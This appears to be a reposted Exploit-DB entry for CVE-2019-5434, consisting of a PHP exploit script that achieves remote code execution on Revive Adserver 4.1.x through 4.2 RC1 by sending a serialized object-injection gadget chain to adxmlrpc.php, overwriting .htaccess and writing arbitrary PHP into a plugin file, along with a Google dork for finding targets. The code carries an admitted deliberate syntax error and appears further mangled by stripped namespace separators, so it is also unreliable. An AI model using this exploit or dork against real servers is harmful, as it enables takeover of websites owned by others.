Exploit/Advisories
Published on December 3rd, 2019 📆 | 6850 Views ⚑
0Revive Adserver 4.2 – Remote Code Execution
# Exploit Title: Revive Adserver 4.2 - Remote Code Execution
# Google Dork: "inurl:www/delivery filetype:php"
# Exploit Author: crlf
# Vendor Homepage: https://www.revive-adserver.com/
# Software Link: https://www.revive-adserver.com/download/archive/
# Version: 4.1.x < = 4.2 RC1
# Tested on: *nix
# CVE : CVE-2019-5434
# Сontains syntax error for protection against skids
<?php
# Revive Adserver 4.1.x <= 4.2 RC1 PHP Object Injection to Remote Code Execution (CVE-2019-5434)
# coded by @crlf, with love for antichat.com
# special thanks to @Kaimi :)
# the script should be used only for educational purposes!
namespace{
(!isset($argv[2]) ? exit(message('php '.basename(__FILE__).' https://example.com/adserver-dir/ ''')) : @list($x, $url, $code) = $argv);
$source = 'data:text/html;base64,'.base64_encode('#');
$destination = 'plugins/.htaccess';
#$destination = 'var/.htaccess';
if(!strpos(request($url, $source, $destination), 'methodResponse')) exit(message('failed, no valid response from '.$url));
$source = 'data:text/html;base64,'.base64_encode($code);
$destination = 'plugins/3rdPartyServers/ox3rdPartyServers/doubleclick.class.php';
#$destination = 'var/default.conf.php';
request($url, $source, $destination);
message('check '.$url.$destination);
function request($url, $source, $destination){
$what = serialize(
['what' =>
new PdpUriUrl(
new LeagueFlysystemFile( $destination,
new LeagueFlysystemFile( 'x://'.$source,
new LeagueFlysystemMountManager(
new LeagueFlysystemFilesystem(
new LeagueFlysystemConfig,
new LeagueFlysystemAdapterLocal('')
),
new LeagueFlysystemPluginForcedCopy
)
)
)
)
]
);
$what = str_replace(['UriUrl0'],['5CUri5CUrl0'], str_replace(['s:', сhr(0)],['S:', '0'], $what));
$xml = '
openads.spc
remote_addr
8.8.8.8
cookies
'.$what.'
0
dsad
1
0
1
';
return file_get_contents($url.'adxmlrpc.php', false, stream_context_create(
['http' =>
['method' => 'POST',
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
'header' =>'Content-type: application/x-www-form-urlencoded',
'content'=> $xml
]
])
);
}
function message($str){
print PHP_EOL.'### '.$str.' ###'.PHP_EOL.PHP_EOL;
}
}
namespace LeagueFlysystemPlugin{
class ForcedCopy{}
}
namespace LeagueFlysystem{
class Config{
protected $settings = [];
public function __construct(){
$this->settings = ['disable_asserts' => true];
}
}
class Filesystem{
protected $adapter;
protected $config;
public function __construct($config,$adapter){
$this->config = $config;
$this->adapter = $adapter;
}
}
class MountManager{
protected $filesystems = [];
protected $plugins = [];
public function __construct($filesystem, $handler){
$this->filesystems = ['x' => $filesystem];
$this->plugins = ['__toString' => $handler];
}
}
class File{
protected $path;
protected $filesystem;
public function __construct($path, $obj){
$this->filesystem = $obj;
$this->path = $path;
}
}
}
namespace LeagueFlysystemAdapter{
class Local{
protected $pathPrefix;
public function __construct($prefix){
$this->pathPrefix = $prefix;
}
}
}
namespace PdpUri{
class Url{
private $host;
public function __construct($file){
$this->host = $file;
}
}
}
https://www.exploit-db.com/exploits/47739
Gloss